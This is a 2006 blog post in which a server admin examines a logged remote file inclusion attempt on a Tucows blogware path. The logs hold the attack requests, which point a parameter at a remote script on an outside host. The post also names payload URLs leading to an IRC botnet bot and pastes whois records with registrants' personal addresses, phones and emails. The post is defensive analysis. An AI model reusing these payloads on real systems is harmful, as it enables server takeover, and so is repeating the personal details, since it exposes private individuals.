I just happened to catch this in my logs. It almost seems like they thought I was using Tucows blogware hosting. Hmm. But I use wordpress. Ohwell, it’s Christmas, I’m bored as fuck, so here is the nitty gritty that I can figure out.
==> /var/log/apache2/fwd.ns1.net_access_log < == fwd.ns1.net besthost5.com - - [25/Dec/2006:05:55:10 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]=http://www.husnaweb.com/c.in? HTTP/1.1" 301 427 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct. ==> /var/log/apache2/px.ns1.net_access_log < == px.ns1.net besthost5.com - - [25/Dec/2006:05:55:11 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV%5bTCA_HOME%5d=http://www.husnaweb.com/c.in%3f HTTP/1.1" 404 52958 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct. ==> /var/log/apache2/fwd.ns1.net_access_log < == fwd.ns1.net besthost5.com - - [25/Dec/2006:05:55:14 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]=http://www.husnaweb.com/c.in? HTTP/1.1" 301 427 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct. ==> /var/log/apache2/px.ns1.net_access_log < == px.ns1.net besthost5.com - - [25/Dec/2006:05:55:14 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV%5bTCA_HOME%5d=http://www.husnaweb.com/c.in%3f HTTP/1.1" 404 52958 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.
If the request had worked, it would have downloaded the file “c.in”, which then tries to embed itself into the server. The request came from an IP address in Bangkok Thailand. 203.146.140.221
The file this hack attempt wanted me to download would have been from a domain registered in Rio De Janeiro, Brazil. Although the IP address is registered to InterNAP in San Jose it appears. 64.74.223.4
At the end of the script it attempts to download this next file.
http://www.husnaweb.com/cmd2.txt
which then attempts to download;
http://www.husnaweb.com/borek.txt
I haven’t seen a script kiddie who can spell and use proper grammar and still the header of this file contains a harsh, but rather true statement.
omg your box got owned. secure ur shit better. if you dont know how, why are you admin of this box?
The rest of the file is an IRC bot, for use in well an Zombie IRC Botnet for whatever ill purposes they choose.
Request: besthost5.com
whois server for *.com is whois.crsnic.net ...
connected to whois.crsnic.net [199.7.59.74:43] ...
connected to whois.dotregistrar.com [209.67.69.25:43] ...
This whois service shows the information for .COM and .NET domains
only if they are registered thru DotRegistrar.com. For ORG, .BIZ, .US .INFO and
.NAME domains, the information is displayed regardless of the sponsoring
registrar for said domains.
The fact that your query returns "NOT FOUND" does not necessarily mean that
the domain may be available for registration. To search all domains, please
go to the shared registry whois located at:
http://www.internic.net/whois.html
Registrant:
Nopparat Thong (BESTHOST5-COM-DOM)
BEST HOST
94/7 Bangchanglow
Bangkok, Bangkok 10700
THAILAND
(662) 8665400
(662) 4112082
nopbk@hotmail.com
Domain Name: BESTHOST5.COM
Status: PROTECTED
Administrative Contact:
Nopparat Thong nopbk@hotmail.com
94/7 Bangchanglow
Bangkok, Bangkok 10700
THAILAND
(662) 8665400
Fax- (662) 4112082
Technical Contact, Zone Contact:
Nopparat Thong nopbk@hotmail.com
94/7 Bangchanglow
Bangkok, Bangkok 10700
THAILAND
(662) 8665400
Fax- (662) 4112082
Record last updated on 03-Jul-2006.
Record expires on 02-Jun-2007.
Record created on 02-Jun-2005.
Domain servers in listed order:
Name Server: ns1.besthost5.com
Name Server: ns2.besthost5.com
connected to whois.apnic.net [202.12.29.13:43] ...
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 203.146.140.192 - 203.146.140.255
netname: csloxinfoidc-th
country: TH
descr: reassign to "CSLOXINFO IDC "
descr: contact "vareepon@csloxinfo.net"
admin-c: LIA1-AP
tech-c: LIA1-AP
status: ASSIGNED NON-PORTABLE
changed: domaster@loxinfo.co.th 20050309
mnt-by: LOXINFO-IS
source: APNIC
role: Loxinfo IP Admins
address: 304 Suapah Rd, Pomprab
address: Pomprab Suttruphai,Bangkok
country: TH
phone: +662 6225678
fax-no: +662 6228380
e-mail: domaster@loxinfo.co.th
admin-c: DL85-AP
tech-c: DL85-AP
nic-hdl: LIA1-AP
mnt-by: LOXINFO-IS
changed: ip_admin@csloxinfo.net 20060703
source: APNICRequest: 208.101.16.120
connected to whois.arin.net [192.149.252.44:43] ...
connected to rwhois.softlayer.com [66.228.118.81:4321] ...
%rwhois V-1.5:003fff:00 rwhois.softlayer.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:NETBLK-SOFTLAYER.208.101.0.0/18
network:Auth-Area:208.101.0.0/18
network:Network-Name:SOFTLAYER-208.101.0.0
network:IP-Network:208.101.16.120/29
network:IP-Network-Block:208.101.16.120-208.101.16.127
network:Organization;I:BaseRunner Net Services
network:Street-Address:9 Brian Drive
network:City:Rochester
network:State:NY
network:Postal-Code:14624-3603
network:Country-Code:US
network:Tech-Contact;I:sysadmins@softlayer.com
network:Abuse-Contact;I:abuse@softlayer.com
network:Admin-Contact;I:IPADM258-ARIN
network:Created:20060315
network:Updated:20060315
network:Updated-By:ipadmin@softlayer.com
Registrant:
Husna Ahmad
1691 South Ave
Rochester, New York 14620
United States
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: HUSNAWEB.COM
Created on: 11-Jun-03
Expires on: 11-Jun-07
Last Updated on:
Administrative Contact:
Ahmad, Husna ahmad_husna@yahoo.com
1691 South Ave
Rochester, New York 14620
United States
585 507-2244
Technical Contact:
Ahmad, Husna ahmad_husna@yahoo.com
1691 South Ave
Rochester, New York 14620
United States
585 507-2244
Domain servers in listed order:
NS1.BASERUNNER.NET
NS2.BASERUNNER.NET
Request: 64.74.223.4
connected to whois.arin.net [192.149.252.44:43] ...
Internap Network Services PNAP-SEA-BLOCK4 (NET-64-74-0-0-1)
64.74.0.0 - 64.74.255.255
eNom INAP-SJE-ENOM-3077 (NET-64-74-223-0-1)
64.74.223.0 - 64.74.223.255
Request: NET-64-74-223-0-1
connected to whois.arin.net [192.149.252.44:43] ...
CustName: eNom
Address: 2002 156th Ave NE
City: Bellevue
StateProv: WA
PostalCode: 98008
Country: US
RegDate: 2005-09-23
Updated: 2005-09-23
NetRange: 64.74.223.0 - 64.74.223.255
CIDR: 64.74.223.0/24
NetName: INAP-SJE-ENOM-3077
NetHandle: NET-64-74-223-0-1
Parent: NET-64-74-0-0-1
NetType: Reassigned
Comment:
RegDate: 2005-09-23
Updated: 2005-09-23
RTechHandle: INO3-ARIN
RTechName: InterNap Network Operations Center
RTechPhone: +1-877-843-4662
RTechEmail: noc@internap.com
OrgAbuseHandle: IAC3-ARIN
OrgAbuseName: Internap Abuse Contact
OrgAbusePhone: +1-206-256-9500
OrgAbuseEmail: abuse@internap.com
OrgTechHandle: INO3-ARIN
OrgTechName: InterNap Network Operations Center
OrgTechPhone: +1-877-843-4662
OrgTechEmail: noc@internap.com
# ARIN WHOIS database, last updated 2006-12-24 19:10
Request: full-comandos.com
whois server for *.com is whois.crsnic.net ...
connected to whois.crsnic.net [199.7.50.74:43] ...
connected to whois.enom.com [72.5.232.19:43] ...
=-=-=-=
Visit AboutUs.org for more information about full-comandos.com
<a href="http://www.aboutus.org/full-comandos.com">AboutUs: full-comandos.com
Registration Service Provided By: Surpass Hosting
Contact: enom@surpasshosting.com
Visit: http://www.surpasshosting.com
Domain name: full-comandos.com
Registrant Contact:
Full-Comandos
Full Comandos (svitlanad@bsdmail.com)
+55.2126673894
Fax: +55.2126673894
Rua Retirodos Artistas
Rio de Janeiro, RJ 38763-000
BR
Administrative Contact:
Full-Comandos
Full Comandos (svitlanad@bsdmail.com)
+55.2126673894
Fax: +55.2126673894
Rua Retirodos Artistas
Rio de Janeiro, RJ 38763-000
BR
Technical Contact:
Full-Comandos
Full Comandos (svitlanad@bsdmail.com)
+55.2126673894
Fax: +55.2126673894
Rua Retirodos Artistas
Rio de Janeiro, RJ 38763-000
BR
Status: Locked
Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com
Creation date: 26 Nov 2005 14:14:08
Expiration date: 26 Nov 2006 14:14:08
</a>The interesting thing about the previous domain, you will notice that the domain has been expired for almost an entire months time.
Domain Registrars should immediately terminate the domain registration, and DNS records when this stuff is reported, but they don’t. If they actually bothered to just remove the DNS records from expired domains, that would help also.
[tags]xss, hack attempt, hack, irc botnet, tucows, blogware, freedbacking, rant[/tags]



